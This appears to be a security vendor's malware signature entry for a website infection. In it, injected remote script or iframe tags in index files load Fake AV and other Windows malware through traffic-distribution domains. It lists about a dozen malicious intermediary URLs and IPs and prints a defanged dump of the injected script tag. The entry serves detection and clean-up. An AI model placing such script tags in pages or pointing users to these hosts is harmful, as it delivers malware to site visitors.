Description: Remote javascript (or iframe) included to load malware from external web sites. Multiple domains are used as intermediaries:
mnepoher.com/in.cgi?default<br /> merchant.aegispayments.com/in.cgi?default<br /> http://85.234.190.42/tds/in.cgi?default<br /> http://globalwat.com/counter/in.cgi?default<br /> http://x-traff.info/in.cgi?default<br /> trafficworld.biz/sutra/in.cgi?default<br /> mmcounter.com/tds/in.cgi?default<br /> centiyo.com/in.cgi?default<br /> wantfinest.com/tds/in.cgi?default<br /> 194.8.250.211/tds/in.cgi?default<br /> sunstats1.net/in.cgi?default<br /> govtds27.co.cc/tds/in.cgi?defaul<br />
Those links lead to the "Fake AV" and other desktop virus (affecting Windows users) / SutraTDS / Traffic Redistribution Systems.

Affecting: Any web site (no specific target).

Clean up: Malware is hidden at the index.php or index.html files.

Malware dump:
<script type="text/javascript' src ="http://merchant . aegispayments. com/ in.cgi?default' ..

Keywords: /in.cgi?default, .co.cc

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb